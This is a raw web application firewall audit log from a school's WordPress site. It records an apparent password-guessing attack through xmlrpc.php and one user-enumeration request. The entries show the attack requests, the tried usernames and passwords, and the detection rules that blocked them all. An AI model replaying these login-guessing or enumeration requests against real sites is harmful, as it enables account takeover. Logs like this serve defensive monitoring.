Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749870994255158 2736 (- - -) Stopwatch2: 1749870994255158 2736; combined=1212, p1=406, p2=777, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3f2eb6d-Z-- --547b3f4e-A-- [14/Jun/2025:10:16:56 +0700] aEzpqEMWfhkd5Y0sFtrvFQAAAJQ 103.236.140.4 45896 103.236.140.4 8181 --547b3f4e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --547b3f4e-C-- wp.getUsersBlogs timkreatif aaron431 --547b3f4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --547b3f4e-E-- --547b3f4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (87+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871016669148 4178 (- - -) Stopwatch2: 1749871016669148 4178; combined=3235, p1=381, p2=2673, p3=0, p4=0, p5=104, sr=83, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --547b3f4e-Z-- --c0b2784d-A-- [14/Jun/2025:10:17:59 +0700] aEzp52mwZ6YUkjOdtI7NtAAAAAY 103.236.140.4 46092 103.236.140.4 8181 --c0b2784d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c0b2784d-C-- wp.getUsersBlogs timkreatif arsenal1 --c0b2784d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0b2784d-E-- --c0b2784d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871079543871 5449 (- - -) Stopwatch2: 1749871079543871 5449; combined=3855, p1=487, p2=3196, p3=0, p4=0, p5=101, sr=96, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0b2784d-Z-- --9b4c4f00-A-- [14/Jun/2025:10:19:04 +0700] aEzqKF3g_boun6Rx5jLTwgAAAMo 103.236.140.4 46226 103.236.140.4 8181 --9b4c4f00-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9b4c4f00-C-- wp.getUsersBlogs timkreatif playboy --9b4c4f00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b4c4f00-E-- --9b4c4f00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871144423019 5851 (- - -) Stopwatch2: 1749871144423019 5851; combined=4080, p1=512, p2=3373, p3=0, p4=0, p5=112, sr=103, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b4c4f00-Z-- --a4084234-A-- [14/Jun/2025:10:20:05 +0700] aEzqZWmwZ6YUkjOdtI7N4wAAABg 103.236.140.4 46338 103.236.140.4 8181 --a4084234-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a4084234-C-- wp.getUsersBlogs timkreatif shaggy --a4084234-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4084234-E-- --a4084234-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (41+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871205194913 6068 (- - -) Stopwatch2: 1749871205194913 6068; combined=4210, p1=546, p2=3487, p3=0, p4=0, p5=105, sr=94, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4084234-Z-- --013ec053-A-- [14/Jun/2025:10:21:08 +0700] aEzqpEMWfhkd5Y0sFtrvlgAAAJQ 103.236.140.4 46366 103.236.140.4 8181 --013ec053-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --013ec053-C-- wp.getUsersBlogs miswan hMRgaTlMUWYb --013ec053-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --013ec053-E-- --013ec053-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (10+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871268908042 5487 (- - -) Stopwatch2: 1749871268908042 5487; combined=3833, p1=494, p2=3169, p3=0, p4=0, p5=100, sr=105, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --013ec053-Z-- --c6824a05-A-- [14/Jun/2025:10:22:08 +0700] aEzq4EMWfhkd5Y0sFtrvygAAAJc 103.236.140.4 46494 103.236.140.4 8181 --c6824a05-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c6824a05-C-- wp.getUsersBlogs miswan servmask --c6824a05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6824a05-E-- --c6824a05-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (62+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871328274397 5205 (- - -) Stopwatch2: 1749871328274397 5205; combined=3693, p1=420, p2=3062, p3=0, p4=0, p5=120, sr=94, sw=91, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6824a05-Z-- --82025340-A-- [14/Jun/2025:10:23:09 +0700] aEzrHV3g_boun6Rx5jLTzwAAANg 103.236.140.4 46644 103.236.140.4 8181 --82025340-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --82025340-C-- wp.getUsersBlogs miswan Admin123456 --82025340-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82025340-E-- --82025340-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (71+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871389924025 6252 (- - -) Stopwatch2: 1749871389924025 6252; combined=4336, p1=576, p2=3564, p3=0, p4=0, p5=115, sr=99, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82025340-Z-- --c854b173-A-- [14/Jun/2025:10:24:09 +0700] aEzrWUMWfhkd5Y0sFtrwKAAAAIA 103.236.140.4 46706 103.236.140.4 8181 --c854b173-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c854b173-C-- wp.getUsersBlogs miswan smkn22-jktschid --c854b173-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c854b173-E-- --c854b173-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (21+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871449467986 5718 (- - -) Stopwatch2: 1749871449467986 5718; combined=3995, p1=513, p2=3306, p3=0, p4=0, p5=104, sr=109, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c854b173-Z-- --32671948-A-- [14/Jun/2025:10:25:11 +0700] aEzrl2IDXuKmWNi2UBS5ewAAAE8 103.236.140.4 46846 103.236.140.4 8181 --32671948-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --32671948-C-- wp.getUsersBlogs miswan ADMIN --32671948-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32671948-E-- --32671948-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871511095376 4436 (- - -) Stopwatch2: 1749871511095376 4436; combined=3264, p1=368, p2=2725, p3=0, p4=0, p5=100, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32671948-Z-- --3672f50f-A-- [14/Jun/2025:10:26:11 +0700] aEzr02IDXuKmWNi2UBS5iAAAAEg 103.236.140.4 46880 103.236.140.4 8181 --3672f50f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 232 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3672f50f-C-- wp.getUsersBlogs miswan smkn22-jkt_sch_id000 --3672f50f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3672f50f-E-- --3672f50f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (11+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871571943085 4414 (- - -) Stopwatch2: 1749871571943085 4414; combined=3409, p1=393, p2=2844, p3=0, p4=0, p5=101, sr=111, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3672f50f-Z-- --e5703a0f-A-- [14/Jun/2025:10:27:12 +0700] aEzsEGIDXuKmWNi2UBS5tgAAAEg 103.236.140.4 46984 103.236.140.4 8181 --e5703a0f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e5703a0f-C-- wp.getUsersBlogs miswan Admin12 --e5703a0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5703a0f-E-- --e5703a0f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (49+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871632160003 4463 (- - -) Stopwatch2: 1749871632160003 4463; combined=3440, p1=396, p2=2868, p3=0, p4=0, p5=102, sr=105, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5703a0f-Z-- --4725f76e-A-- [14/Jun/2025:10:28:20 +0700] aEzsVGIDXuKmWNi2UBS5wwAAAEE 103.236.140.4 47018 103.236.140.4 8181 --4725f76e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --4725f76e-C-- wp.getUsersBlogs miswan qwer123 --4725f76e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4725f76e-E-- --4725f76e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (13+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871700247845 5402 (- - -) Stopwatch2: 1749871700247845 5402; combined=3786, p1=484, p2=3111, p3=0, p4=0, p5=111, sr=94, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4725f76e-Z-- --0fef570d-A-- [14/Jun/2025:10:29:26 +0700] aEzslmIDXuKmWNi2UBS52QAAAEM 103.236.140.4 47082 103.236.140.4 8181 --0fef570d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0fef570d-C-- wp.getUsersBlogs miswan nothing --0fef570d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fef570d-E-- --0fef570d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871766339654 5059 (- - -) Stopwatch2: 1749871766339654 5059; combined=3358, p1=419, p2=2768, p3=0, p4=0, p5=99, sr=83, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fef570d-Z-- --53a2071a-A-- [14/Jun/2025:10:29:38 +0700] aEzsomIDXuKmWNi2UBS53gAAAEo 103.236.140.4 47094 103.236.140.4 8181 --53a2071a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.89.181.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.89.181.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --53a2071a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53a2071a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749871778890392 3306 (- - -) Stopwatch2: 1749871778890392 3306; combined=1431, p1=488, p2=910, p3=0, p4=0, p5=33, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53a2071a-Z-- --389ccb7f-A-- [14/Jun/2025:10:30:31 +0700] aEzs12mwZ6YUkjOdtI7N7AAAABE 103.236.140.4 47168 103.236.140.4 8181 --389ccb7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --389ccb7f-C-- wp.getUsersBlogs miswan 110110 --389ccb7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --389ccb7f-E-- --389ccb7f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749871831854458 6094 (- - -) Stopwatch2: 1749871831854458 6094; combined=4063, p1=509, p2=3379, p3=0, p4=0, p5=104, sr=84, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --389ccb7f-Z-- --3e438753-A-- [14/Jun/2025:10:31:31 +0700] aEztE0MWfhkd5Y0sFtrwcwAAAIg 103.236.140.4 47326 103.236.140.4 8181 --3e438753-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 215 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3e438753-C-- wp.getUsersBlogs miswan xxx --3e438753-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e438753-E-- --3e438753-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 